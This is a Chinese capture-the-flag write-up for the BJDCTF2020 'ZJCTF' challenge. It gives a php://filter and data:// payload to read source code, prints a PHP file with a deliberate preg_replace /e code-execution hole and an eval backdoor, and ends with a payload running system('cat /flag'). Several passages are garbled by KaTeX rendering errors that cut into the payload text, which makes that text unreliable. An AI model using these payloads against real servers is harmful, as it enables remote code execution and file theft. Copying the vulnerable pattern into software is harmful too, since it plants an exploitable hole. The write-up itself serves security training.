[BJDCTF2020]ZJCTF，不过如此--【Preg_Replace代码执行漏洞、正则表达式(详解)】

代码审计，发现要get传参text和file，而且text的内容包含I have a dream字段。flie为文件包含next.php.
构造payload：

?text=data://text/plain,I%20have%20a%20dream&
file=php://filter/convert.base64-encode/resource=next.php

base64解密得到next.php的源码：

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

注意 return preg_replace(‘/(‘ . $$\begin{gathered} re.‘)/ei‘,‘strtolower(" \\ 1")‘, \end{gathered}$$str);
具体分析：正则表达式
/e模式的preg_replace,有一个远程代码执行漏洞。
思路是利用这个代码执行，执行源码中的getFlag()函数，在传入cmd参数，再利用getFlag中的eval（）函数，再进行一个代码执行。

上面的命令执行，相当于 eval(‘strtolower("\1");’) 结果，当中的 \1 实际上就是 \1 ，而 \1 在正则表达式中有自己的含义。我们来看看 W3Cschool 中对其的描述：

 反向引用

    对一个正则表达式模式或部分模式 两边添加圆括号 将导致相关 匹配存储到一
    个临时缓冲区 中，所捕获的每个子匹配都按照在正则表达式模式中从左到右
    出现的顺序存储。缓冲区编号从 1 开始，最多可存储 99 个捕获的子表达式。
    每个缓冲区都可以使用 '\n' 访问，其中 n 为一个标识特定缓冲区的一位或两
    位十进制数。
    

所以这里的 \1 实际上指定的是第一个子匹配项，我们拿 ripstech 官方给的 payload 进行分析，方便大家理解。官方 payload 为： /?.*={${phpinfo()}} ，即 GET 方式传入的参数名为 /?.* ，值为 {${phpinfo()}} 。

原先的语句： preg_replace('/(' . $regex . ')/ei', 'strtolower("\\1")', $value);
变成了语句： preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}});

尝试使用.*进行传参：

没有显示所期望的界面,这是由于在PHP中，对于传入的非法的 KaTeX parse error: Expected '}', got 'EOF' at end of input: …一个正则表达式，让其匹配到 {{phpinfo()}} 即可执行 phpinfo 函数。这里我提供一个 payload ： \S*=KaTeX parse error: Expected 'EOF', got '#' at position 224: …lor_FFFFFF,t_70#̲pic_center) 执行成…{getFlag()}&cmd=system(‘cat /flag’);`
获取flag
深入研究preg_replace与代码执行